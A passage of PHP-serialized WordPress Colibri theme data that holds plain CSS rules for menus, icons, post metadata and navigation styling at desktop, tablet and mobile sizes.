0px;\n}\n#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item,#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover {\n margin-top: 0px;\n margin-right: 20px;\n margin-bottom: 0px;\n margin-left: 20px;\n padding-top: 10px;\n padding-right: 0px;\n padding-bottom: 10px;\n padding-left: 0px;\n}\n#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu > li > a {\n font-family: Open Sans;\n font-weight: 600;\n text-transform: uppercase;\n font-size: 14px;\n line-height: 1.5em;\n letter-spacing: 0px;\n color: #FFFFFF;\n}\n#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu > li.hover > a {\n color: rgb(166, 220, 244);\n}\n#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu > li:hover > a,#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu > li.hover > a {\n color: rgb(166, 220, 244);\n}\n#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a,#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a:hover {\n font-family: Open Sans;\n font-weight: 600;\n text-transform: uppercase;\n font-size: 14px;\n line-height: 1.5em;\n letter-spacing: 0px;\n color: rgb(166, 220, 244);\n}\n#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu li > ul {\n background-color: #ffffff;\n background-image: none;\n margin-right: 5px;\n margin-left: 5px;\n box-shadow: 0px 0px 5px 2px rgba(0, 0, 0, 0.04) ;\n}\n#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu li > ul li {\n padding-top: 10px;\n padding-right: 20px;\n padding-bottom: 10px;\n padding-left: 20px;\n border-top-width: 0px;\n border-top-style: none;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 1px;\n border-bottom-color: rgba(128,128,128,.2);\n border-bottom-style: solid;\n border-left-width: 0px;\n border-left-style: none;\n background-color: rgb(255, 255, 255);\n background-image: none;\n}\n#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.hover {\n background-color: #03a9f4;\n}\n#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu li > ul > li:hover,#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.hover {\n background-color: #03a9f4;\n}\n#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item,#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover {\n padding-top: 10px;\n padding-right: 20px;\n padding-bottom: 10px;\n padding-left: 20px;\n border-top-width: 0px;\n border-top-style: none;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 1px;\n border-bottom-color: rgba(128,128,128,.2);\n border-bottom-style: solid;\n border-left-width: 0px;\n border-left-style: none;\n background-color: #03a9f4;\n background-image: none;\n}\n#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu li > ul > li > a {\n font-size: 14px;\n color: rgb(102, 102, 102);\n}\n#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.hover > a {\n color: rgb(255, 255, 255);\n}\n#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu li > ul > li:hover > a,#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.hover > a {\n color: rgb(255, 255, 255);\n}\n#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item > a,#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item > a:hover {\n font-size: 14px;\n color: rgb(255, 255, 255);\n}\n#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu.bordered-active-item > li::after,#colibri .style-42 \n ul.colibri-menu.bordered-active-item > li::before {\n background-color: rgb(166, 220, 244);\n background-image: none;\n height: 3px;\n}\n#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu.solid-active-item > li::after,#colibri .style-42 \n ul.colibri-menu.solid-active-item > li::before {\n background-color: white;\n background-image: none;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 0%;\n border-top-right-radius: 0%;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 0%;\n border-bottom-right-radius: 0%;\n border-left-width: 0px;\n border-left-style: none;\n}\n#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu > li > ul {\n margin-top: 0px;\n}\n#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu > li > ul::before {\n height: 0px;\n width: 100% ;\n}\n#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu li > a > svg,#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu li > a > .arrow-wrapper {\n padding-right: 5px;\n padding-left: 5px;\n color: black;\n}\n#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu li.current_page_item > a > svg,#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover > a > svg,#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu li.current_page_item > a > .arrow-wrapper,#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover > a > .arrow-wrapper {\n padding-right: 5px;\n padding-left: 5px;\n color: black;\n}\n#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu li > ul li > a > svg,#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu li > ul li > a > .arrow-wrapper {\n color: rgb(255, 255, 255);\n}\n#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item > a > svg,#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover > a > svg,#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item > a > .arrow-wrapper,#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover > a > .arrow-wrapper {\n color: rgb(255, 255, 255);\n}\n#colibri .h-navigation_sticky .style-42 > div > .colibri-menu-container > ul.colibri-menu > li > a,#colibri .h-navigation_sticky.style-42 > div > .colibri-menu-container > ul.colibri-menu > li > a {\n color: rgb(2, 110, 159);\n}\n#colibri .h-navigation_sticky .style-42 > div > .colibri-menu-container > ul.colibri-menu > li.hover > a,#colibri .h-navigation_sticky.style-42 > div > .colibri-menu-container > ul.colibri-menu > li.hover > a {\n color: #03a9f4;\n}\n#colibri .h-navigation_sticky .style-42 > div > .colibri-menu-container > ul.colibri-menu > li:hover > a,#colibri .h-navigation_sticky .style-42 > div > .colibri-menu-container > ul.colibri-menu > li.hover > a,#colibri .h-navigation_sticky.style-42 > div > .colibri-menu-container > ul.colibri-menu > li:hover > a,#colibri .h-navigation_sticky.style-42 > div > .colibri-menu-container > ul.colibri-menu > li.hover > a {\n color: #03a9f4;\n}\n#colibri .h-navigation_sticky .style-42 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a,#colibri .h-navigation_sticky .style-42 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a:hover,#colibri .h-navigation_sticky.style-42 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a,#colibri .h-navigation_sticky.style-42 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a:hover {\n color: #03a9f4;\n}\n#colibri .h-navigation_sticky .style-42 > div > .colibri-menu-container > ul.colibri-menu.bordered-active-item > li::after,#colibri .h-navigation_sticky .style-42 \n ul.colibri-menu.bordered-active-item > li::before,#colibri .h-navigation_sticky.style-42 > div > .colibri-menu-container > ul.colibri-menu.bordered-active-item > li::after,#colibri .h-navigation_sticky.style-42 \n ul.colibri-menu.bordered-active-item > li::before {\n background-color: #03a9f4;\n background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:43;a:3:{s:7:\"desktop\";s:928:\"#colibri .style-43-offscreen {\n background-color: #222B34;\n background-image: none;\n width: 300px !important;\n}\n#colibri .style-43-offscreenOverlay {\n background-color: rgba(0,0,0,0.5);\n background-image: none;\n}\n#colibri .style-43 .h-hamburger-icon {\n background-color: rgba(0, 0, 0, 0.1);\n background-image: none;\n border-top-width: 0px;\n border-top-color: black;\n border-top-style: solid;\n border-top-left-radius: 100%;\n border-top-right-radius: 100%;\n border-right-width: 0px;\n border-right-color: black;\n border-right-style: solid;\n border-bottom-width: 0px;\n border-bottom-color: black;\n border-bottom-style: solid;\n border-bottom-left-radius: 100%;\n border-bottom-right-radius: 100%;\n border-left-width: 0px;\n border-left-color: black;\n border-left-style: solid;\n fill: white;\n padding-top: 5px;\n padding-right: 5px;\n padding-bottom: 5px;\n padding-left: 5px;\n width: 24px;\n height: 24px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:44;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:45;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:46;a:3:{s:7:\"desktop\";s:82:\"#colibri .style-46 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:47;a:3:{s:7:\"desktop\";s:496:\"#colibri .style-47-image {\n max-height: 70px;\n}\n#colibri .style-47 a,#colibri .style-47 .logo-text {\n color: #ffffff;\n text-decoration: none;\n}\n#colibri .h-navigation_sticky .style-47-image,#colibri .h-navigation_sticky.style-47-image {\n max-height: 70px;\n}\n#colibri .h-navigation_sticky .style-47 a,#colibri .h-navigation_sticky .style-47 .logo-text,#colibri .h-navigation_sticky.style-47 a,#colibri .h-navigation_sticky.style-47 .logo-text {\n color: #000000;\n text-decoration: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:48;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:49;a:3:{s:7:\"desktop\";s:82:\"#colibri .style-49 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:50;a:3:{s:7:\"desktop\";s:3929:\"#colibri .style-50 > div > .colibri-menu-container > ul.colibri-menu > li > a {\n padding-top: 12px;\n padding-bottom: 12px;\n padding-left: 40px;\n border-top-width: 0px;\n border-top-color: #808080;\n border-top-style: solid;\n border-right-width: 0px;\n border-right-color: #808080;\n border-right-style: solid;\n border-bottom-width: 1px;\n border-bottom-color: #808080;\n border-bottom-style: solid;\n border-left-width: 0px;\n border-left-color: #808080;\n border-left-style: solid;\n font-size: 14px;\n color: white;\n}\n#colibri .style-50 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a,#colibri .style-50 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a:hover {\n padding-top: 12px;\n padding-bottom: 12px;\n padding-left: 40px;\n border-top-width: 0px;\n border-top-color: #808080;\n border-top-style: solid;\n border-right-width: 0px;\n border-right-color: #808080;\n border-right-style: solid;\n border-bottom-width: 1px;\n border-bottom-color: #808080;\n border-bottom-style: solid;\n border-left-width: 0px;\n border-left-color: #808080;\n border-left-style: solid;\n font-size: 14px;\n color: white;\n}\n#colibri .style-50 > div > .colibri-menu-container > ul.colibri-menu li > ul > li > a {\n padding-top: 12px;\n padding-bottom: 12px;\n padding-left: 40px;\n border-top-width: 0px;\n border-top-color: #808080;\n border-top-style: solid;\n border-right-width: 0px;\n border-right-color: #808080;\n border-right-style: solid;\n border-bottom-width: 1px;\n border-bottom-color: #808080;\n border-bottom-style: solid;\n border-left-width: 0px;\n border-left-color: #808080;\n border-left-style: solid;\n font-size: 14px;\n color: white;\n}\n#colibri .style-50 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item > a,#colibri .style-50 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item > a:hover {\n padding-top: 12px;\n padding-bottom: 12px;\n padding-left: 40px;\n border-top-width: 0px;\n border-top-color: #808080;\n border-top-style: solid;\n border-right-width: 0px;\n border-right-color: #808080;\n border-right-style: solid;\n border-bottom-width: 1px;\n border-bottom-color: #808080;\n border-bottom-style: solid;\n border-left-width: 0px;\n border-left-color: #808080;\n border-left-style: solid;\n font-size: 14px;\n color: white;\n}\n#colibri .style-50 > div > .colibri-menu-container > ul.colibri-menu li > a > svg,#colibri .style-50 > div > .colibri-menu-container > ul.colibri-menu li > a > .arrow-wrapper {\n padding-right: 20px;\n padding-left: 20px;\n color: black;\n}\n#colibri .style-50 > div > .colibri-menu-container > ul.colibri-menu li.current_page_item > a > svg,#colibri .style-50 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover > a > svg,#colibri .style-50 > div > .colibri-menu-container > ul.colibri-menu li.current_page_item > a > .arrow-wrapper,#colibri .style-50 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover > a > .arrow-wrapper {\n padding-right: 20px;\n padding-left: 20px;\n color: black;\n}\n#colibri .style-50 > div > .colibri-menu-container > ul.colibri-menu li > ul li > a > svg,#colibri .style-50 > div > .colibri-menu-container > ul.colibri-menu li > ul li > a > .arrow-wrapper {\n color: white;\n padding-right: 20px;\n padding-left: 20px;\n}\n#colibri .style-50 > div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item > a > svg,#colibri .style-50 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover > a > svg,#colibri .style-50 > div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item > a > .arrow-wrapper,#colibri .style-50 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover > a > .arrow-wrapper {\n color: white;\n padding-right: 20px;\n padding-left: 20px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:51;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:52;a:3:{s:7:\"desktop\";s:164:\"#colibri .style-52 {\n background-color: black;\n background-image: none;\n padding-top: 5px;\n padding-right: 15px;\n padding-bottom: 5px;\n padding-left: 15px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:53;a:3:{s:7:\"desktop\";s:80:\"#colibri .style-53 {\n text-align: left;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:54;a:3:{s:7:\"desktop\";s:1279:\"#colibri .style-54-icon {\n fill: #FFFFFF;\n width: 18px ;\n height: 18px;\n padding-left: 0px;\n border-top-width: 2px;\n border-top-color: #03a9f4;\n border-top-style: none;\n border-right-width: 2px;\n border-right-color: #03a9f4;\n border-right-style: none;\n border-bottom-width: 2px;\n border-bottom-color: #03a9f4;\n border-bottom-style: none;\n border-left-width: 2px;\n border-left-color: #03a9f4;\n border-left-style: none;\n}\n#colibri .style-54-icon:hover {\n background-color: rgba(3, 169, 244, 0);\n background-image: none;\n}\n#colibri .style-54 .list-item-text-wrapper {\n horizontal-align: start;\n padding-right: 0px;\n padding-bottom: 0px;\n}\n#colibri .style-54 .list-text {\n margin-left: 5px;\n color: #FFFFFF;\n font-size: 14px;\n}\n#colibri .style-54 .list-divider {\n color: rgb(0,0,0);\n width: 100% ;\n height: 100%;\n border-top-width: 0px;\n border-top-style: solid;\n border-right-width: 0px;\n border-right-style: solid;\n border-bottom-width: 0px;\n border-bottom-color: rgb(0,0,0);\n border-bottom-style: solid;\n border-left-width: 1px;\n border-left-style: solid;\n margin-left: 0px;\n}\n#colibri .style-54 .list-container-divider {\n width: 1px ;\n padding-top: 0px;\n padding-right: 10px;\n padding-bottom: 0px;\n padding-left: 10px;\n height: 100%;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:55;a:3:{s:7:\"desktop\";s:82:\"#colibri .style-55 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:56;a:3:{s:7:\"desktop\";s:376:\"#colibri .style-56 .social-icon-container {\n margin-right: 0px;\n padding-top: 5px;\n padding-right: 5px;\n padding-bottom: 5px;\n padding-left: 5px;\n}\n#colibri .style-56 .icon-container {\n fill: rgb(204, 204, 204);\n width: 20px ;\n height: 20px;\n}\n#colibri .style-56 .icon-container:hover {\n fill: #FFFFFF;\n}\n#colibri .style-56 .icon-container:hover {\n fill: #FFFFFF;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:57;a:3:{s:7:\"desktop\";s:485:\"#colibri .style-57 {\n height: auto;\n min-height: unset;\n color: #FFFFFF;\n background-color: #03a9f4;\n background-image: none;\n padding-top: 50px;\n padding-bottom: 50px;\n}\n#colibri .style-57 h1 {\n color: #FFFFFF;\n}\n#colibri .style-57 h2 {\n color: #FFFFFF;\n}\n#colibri .style-57 h3 {\n color: #FFFFFF;\n}\n#colibri .style-57 h4 {\n color: #FFFFFF;\n}\n#colibri .style-57 h5 {\n color: #FFFFFF;\n}\n#colibri .style-57 h6 {\n color: #FFFFFF;\n}\n#colibri .style-57 p {\n color: #FFFFFF;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:58;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:59;a:3:{s:7:\"desktop\";s:82:\"#colibri .style-59 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:60;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:61;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:62;a:3:{s:7:\"desktop\";s:105:\"#colibri .style-62 {\n height: auto;\n min-height: unset;\n padding-top: 30px;\n padding-bottom: 30px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:63;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:64;a:3:{s:7:\"desktop\";s:156:\".style-64 > .h-y-container > *:not(:last-child) {\n margin-bottom: 0px;\n}\n#colibri .style-64 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:65;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:66;a:3:{s:7:\"desktop\";s:482:\"#colibri .style-66 {\n background-color: #FFFFFF;\n background-image: none;\n box-shadow: 0px 10px 40px 0px rgba(1, 51, 74, 0.15) ;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 5px;\n border-top-right-radius: 5px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 5px;\n border-bottom-right-radius: 5px;\n border-left-width: 0px;\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:109:\"#colibri .style-66 {\n margin-top: 10px;\n margin-right: 10px;\n margin-bottom: 10px;\n margin-left: 10px;\n}\n\";}i:67;a:3:{s:7:\"desktop\";s:103:\"#colibri .style-67 {\n height: auto;\n min-height: unset;\n padding-top: 0px;\n padding-bottom: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:68;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:69;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:70;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:71;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:72;a:3:{s:7:\"desktop\";s:76:\"#colibri .style-72 {\n background-color: unset;\n background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:73;a:3:{s:7:\"desktop\";s:209:\".style-73 > .h-y-container > *:not(:last-child) {\n margin-bottom: 0px;\n}\n#colibri .style-73 {\n text-align: center;\n height: auto;\n min-height: unset;\n background-color: unset;\n background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:74;a:3:{s:7:\"desktop\";s:233:\"#colibri .style-74 {\n background-color: #03a9f4;\n background-image: none;\n text-align: center;\n}\n#colibri .style-74 .colibri-post-thumbnail-shortcode img {\n height: 300px;\n object-position: center center;\n object-fit: cover;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:75;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:76;a:3:{s:7:\"desktop\";s:80:\"#colibri .style-76 {\n text-align: left;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:77;a:3:{s:7:\"desktop\";s:646:\"#colibri .style-77 a {\n font-family: Open Sans;\n font-weight: 400;\n text-decoration: none;\n font-size: 14px;\n color: rgb(153, 153, 153);\n}\n#colibri .style-77 a:hover {\n color: rgb(0, 0, 0);\n}\n#colibri .style-77 a:hover {\n color: rgb(0, 0, 0);\n}\n#colibri .style-77 .metadata-prefix {\n font-size: 14px;\n color: rgb(102, 102, 102);\n}\n#colibri .style-77 .metadata-suffix {\n font-size: 14px;\n}\n#colibri .style-77 .metadata-suffix:hover {\n color: rgb(153, 153, 153);\n}\n#colibri .style-77 .metadata-suffix:hover {\n color: rgb(153, 153, 153);\n}\n#colibri .style-77 svg {\n width: 18px ;\n height: 18px;\n display: none;\n margin-right: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:78;a:3:{s:7:\"desktop\";s:169:\"#colibri .style-78 .colibri-post-content {\n margin-bottom: 0px;\n color: rgb(51, 51, 51);\n}\n#colibri .style-78 .colibri-post-content p {\n color: rgb(102, 102, 102);\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:79;a:3:{s:7:\"desktop\";s:45:\"#colibri .style-79 {\n margin-bottom: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:80;a:3:{s:7:\"desktop\";s:82:\"#colibri .style-80 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:81;a:3:{s:7:\"desktop\";s:205:\"#colibri .style-81 {\n font-size: 14px;\n line-height: 1.6;\n color: rgb(102, 102, 102);\n margin-right: 5px;\n}\n#colibri .style-81 p {\n font-size: 14px;\n line-height: 1.6;\n color: rgb(102, 102, 102);\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:82;a:3:{s:7:\"desktop\";s:80:\"#colibri .style-82 {\n text-align: left;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:83;a:3:{s:7:\"desktop\";s:472:\"#colibri .style-83 a,#colibri .style-83 .colibri-post-category {\n margin-right: 5px;\n margin-left: 5px;\n text-decoration: none;\n font-size: 14px;\n line-height: 1.6;\n color: rgb(153, 153, 153);\n}\n#colibri .style-83 a:hover,#colibri .style-83 .colibri-post-category:hover {\n color: rgb(0, 0, 0);\n}\n#colibri .style-83 a:hover,#colibri .style-83 .colibri-post-category:hover {\n color: rgb(0, 0, 0);\n}\n#colibri .style-83 .categories-prefix {\n margin-right: 16px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:84;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:85;a:3:{s:7:\"desktop\";s:82:\"#colibri .style-85 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:86;a:3:{s:7:\"desktop\";s:245:\"#colibri .style-86 {\n font-weight: 400;\n font-size: 14px;\n line-height: 1.6;\n color: rgb(102, 102, 102);\n margin-right: 5px;\n}\n#colibri .style-86 p {\n font-weight: 400;\n font-size: 14px;\n line-height: 1.6;\n color: rgb(102, 102, 102);\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:87;a:3:{s:7:\"desktop\";s:155:\".style-87 > .h-y-container > *:not(:last-child) {\n margin-bottom: 23px;\n}\n#colibri .style-87 {\n text-align: left;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:88;a:3:{s:7:\"desktop\";s:498:\"#colibri .style-88 a,#colibri .style-88 .colibri-post-tag {\n margin-right: 5px;\n margin-left: 5px;\n text-decoration: none;\n font-size: 14px;\n line-height: 1.6;\n color: rgb(153, 153, 153);\n}\n#colibri .style-88 a:hover,#colibri .style-88 .colibri-post-tag:hover {\n color: rgb(0, 0, 0);\n}\n#colibri .style-88 a:hover,#colibri .style-88 .colibri-post-tag:hover {\n color: rgb(0, 0, 0);\n}\n#colibri .style-88 .tags-prefix {\n margin-right: 5px;\n font-size: 14px;\n color: rgb(153, 153, 153);\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:89;a:3:{s:7:\"desktop\";s:452:\"#colibri .style-89 {\n margin-right: 30px;\n margin-left: 30px;\n border-top-width: 1px;\n border-top-color: rgb(238, 238, 238);\n border-top-style: solid;\n border-right-width: 0px;\n border-right-color: rgb(238, 238, 238);\n border-right-style: solid;\n border-bottom-width: 0px;\n border-bottom-color: rgb(238, 238, 238);\n border-bottom-style: solid;\n border-left-width: 0px;\n border-left-color: rgb(238, 238, 238);\n border-left-style: solid;\n}\n\";s:6:\"tablet\";s:66:\"#colibri .style-89 {\n margin-right: 15px;\n margin-left: 15px;\n}\n\";s:6:\"mobile\";s:66:\"#colibri .style-89 {\n margin-right: 15px;\n margin-left: 15px;\n}\n\";}i:90;a:3:{s:7:\"desktop\";s:80:\"#colibri .style-90 {\n text-align: left;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:91;a:3:{s:7:\"desktop\";s:758:\"#colibri .style-91 .nav-previous a,#colibri .style-91 .nav-next a {\n text-decoration: none;\n color: rgb(51, 51, 51);\n border-top-width: 2px;\n border-top-color: black;\n border-top-style: none;\n border-right-width: 2px;\n border-right-color: black;\n border-right-style: none;\n border-bottom-width: 2px;\n border-bottom-color: black;\n border-bottom-style: none;\n border-left-width: 2px;\n border-left-color: black;\n border-left-style: none;\n background-color: unset;\n background-image: none;\n}\n#colibri .style-91 .nav-previous a:hover,#colibri .style-91 .nav-next a:hover {\n color: #03a9f4;\n}\n#colibri .style-91 .nav-previous a:hover,#colibri .style-91 .nav-next a:hover {\n color: #03a9f4;\n}\n#colibri .style-91 .post-title {\n max-width: 40ch;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:92;a:3:{s:7:\"desktop\";s:81:\"#colibri .style-92 {\n text-align: right;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:93;a:3:{s:7:\"desktop\";s:651:\"#colibri .style-93 .nav-previous a,#colibri .style-93 .nav-next a {\n text-decoration: none;\n color: rgb(51, 51, 51);\n border-top-width: 2px;\n border-top-color: black;\n border-top-style: none;\n border-right-width: 2px;\n border-right-color: black;\n border-right-style: none;\n border-bottom-width: 2px;\n border-bottom-color: black;\n border-bottom-style: none;\n border-left-width: 2px;\n border-left-color: black;\n border-left-style: none;\n}\n#colibri .style-93 .nav-previous a:hover,#colibri .style-93 .nav-next a:hover {\n color: #03a9f4;\n}\n#colibri .style-93 .nav-previous a:hover,#colibri .style-93 .nav-next a:hover {\n color: #03a9f4;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:94;a:3:{s:7:\"desktop\";s:103:\"#colibri .style-94 {\n height: auto;\n min-height: unset;\n padding-top: 0px;\n padding-bottom: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:95;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:96;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:97;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:98;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:99;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:100;a:3:{s:7:\"desktop\";s:125:\"#colibri .style-100 {\n text-align: left;\n height: auto;\n min-height: unset;\n padding-top: 0px;\n padding-bottom: 